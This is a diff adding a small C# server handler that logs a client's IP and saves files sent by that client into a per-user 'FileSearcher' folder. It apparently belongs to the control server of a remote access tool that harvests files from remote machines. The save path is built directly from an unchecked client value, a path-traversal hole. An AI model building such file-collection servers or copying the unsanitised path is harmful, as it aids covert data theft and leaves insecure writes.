initial commit
This commit is contained in:
@@ -0,0 +1,14 @@
|
||||
using System.Drawing;
|
||||
using Server.Connectings;
|
||||
using Server.Helper;
|
||||
|
||||
namespace Server.Messages;
|
||||
|
||||
internal class HandlerFileSearcher
|
||||
{
|
||||
public static void Read(Clients client, object[] objects)
|
||||
{
|
||||
Methods.AppendLogs(client.IP, "Save Files in: Users\\" + objects[1]?.ToString() + "\\FileSearcher", Color.MediumPurple);
|
||||
DynamicFiles.Save("Users\\" + objects[1]?.ToString() + "\\FileSearcher", (object[])objects[2]);
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user